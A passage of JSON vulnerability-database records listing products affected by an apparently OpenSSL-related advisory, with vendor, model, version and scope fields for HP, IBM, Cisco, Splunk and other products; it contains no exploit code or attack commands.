"vendor": "hp", "version": "7.2.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.96" }, { "model": "flashsystem 9848-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "project openssl 1.0.1k", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50001.1" }, { "model": "bladecenter -t", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8720" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.2" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "power systems 350.e1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "media services interface", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ctpview", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.6.156" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "810.00" }, { "model": "netscaler gateway", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "project openssl 1.0.1i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.12" }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.13" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2.0.8" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)4.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.6" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "ns oncommand core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.10" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.12" }, { "model": "system management homepage c", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.186" }, { "model": "jabber for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.1" }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365079450" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.5" }, { "model": "enterprise content delivery service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "adaptive security appliance software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.4(7.26)" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.8.0.10" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8886" }, { "model": "unified sip proxy", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4.19" }, { "model": "telepresence advanced media gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4" }, { "model": "unified attendant console premium edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32100" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "tivoli workload scheduler distributed fp03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4" }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "initiate master data service provider hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.3" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "app for stream", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "0" }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.4.1.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "power systems 350.a0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.1.1" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "virtual connect enterprise manager sdk", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.1.6" }, { "model": "systems insight manager sp5", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2.0.3" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.3" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.0.820" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.1" }, { "model": "adaptive security appliance software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.1(5.106)" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2.0.3" }, { "model": "project openssl 0.9.8y", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "upward integration modules for microsoft system center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.4.1.8" }, { "model": "systems insight manager sp1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4.1.8" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x22079060" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "upward integration modules hardware management pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.4" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3850x638370" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x88042590" }, { "model": "project openssl 1.0.0l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.1" }, { "model": "netscaler application delivery controller", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "wireless lan controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "upward integration modules integrated installer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.1" }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7967" }, { "model": "dx360 m4 water cooled type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79180" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.11" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "initiate master data service patient hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.9" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.68" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.00" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "810.02" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.102" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.4" }, { "model": "anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.22" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "application policy infrastructure controller 1.0", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.1.830" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "820.03" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8852" }, { "model": "unified attendant console business edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nextscale nx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "54550" }, { "model": "bladecenter -ht", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8750" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.1" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5205577" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.15-210" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3950x571451.43" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32200" }, { "model": "10g vfsm for bladecenter", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.6.0" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.2" }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365042550" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.2" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.7" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.9.1" }, { "model": "jabber video for telepresence", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571910" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0-103" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.12.201" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.16" }, { "model": "proventia network enterprise scanner", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.95" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.11" }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.1.3.3" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.7.770" }, { "model": "prime collaboration deployment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.81" }, { "model": "dx series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0-95" }, { "model": "virtualization experience media engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0.6" }, { "model": "tivoli workload scheduler distributed fp05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "tivoli workload scheduler distributed fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0" }, { "model": "project openssl 0.9.8za", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2.0.8" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.4" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "780.00" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "ace30 application control engine module 3.0 a5", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "junos os 12.3r10", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "unified computing system b-series servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.96" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365079150" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571480" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.1.0.6" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.6" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.7" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)4.1" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.1.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.2.127" }, { "model": "jabber software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.50" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.800" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.8" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.4.0.2" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "cms r17 r4", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.21" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087220" }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0.4" }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x350073800" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.60" }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1881" }, { "model": "powerlinux 7r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8v" }, { "model": "flex system fabric si4093 system interconnect module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.4.0" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.1-73" }, { "model": "infosphere balanced warehouse c4000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "infosphere master data management patient hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.4.1" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.1.4" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8.780" }, { "model": "power systems 350.b0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "system idataplex dx360 m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x63910" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "upward integration modules scvmm add-in", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.4" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0.5" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "identity service engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 0.9.8g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.15" }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "virtual connect enterprise manager sdk", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.0" }, { "model": "wag310g residential gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5" }, { "model": "power ese", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.0-14" }, { "model": "hunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "infosphere master data management", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "11.4" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571460" }, { "model": "sametime community server hf1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3950x571431.43" }, { "model": "as infinity", "scope": "ne", "trust": 0.3, "vendor": "pexip", "version": "8.1" }, { "model": "cognos controller if1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1.1.3" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.2" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "820.02" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.15" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.2" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.00" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "810.11" }, { "model": "project openssl 1.0.0o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.1.7" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "tivoli workload scheduler for applications fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0.860" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2" }, { "model": "linux enterprise server for vmware sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux enterprise server sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "system management homepage b", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5.146" }, { "model": "email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.6" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.1(0.625)" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7779" }, { "model": "agent desktop", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(2)" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x88079030" }, { "model": "upward integration modules for vmware vsphere", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.5.3" }, { "model": "sametime community server limited use", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9" }, { "model": "flex system en2092 1gb ethernet scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.4.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0.870" }, { "model": "flex system p260 compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-22x)0" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24087370" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571470" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "system management homepage b", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2.77" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "jabber voice for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.3" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.10" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.12.1" }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "52056340" }, { "model": "ctpos 7.0r4", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "unified attendant console department edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.840" }, { "model": "system management homepage a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.11.197" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.14" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.3" }, { "model": "power system s824l", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.15210" }, { "model": "network performance analytics", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "splunk", "scope": "ne", "trust": 0.3, "vendor": "splunk", "version": "6.0.8" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.64" }, { "model": "system m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365041990" }, { "model": "system m4 hd type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365054600" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": 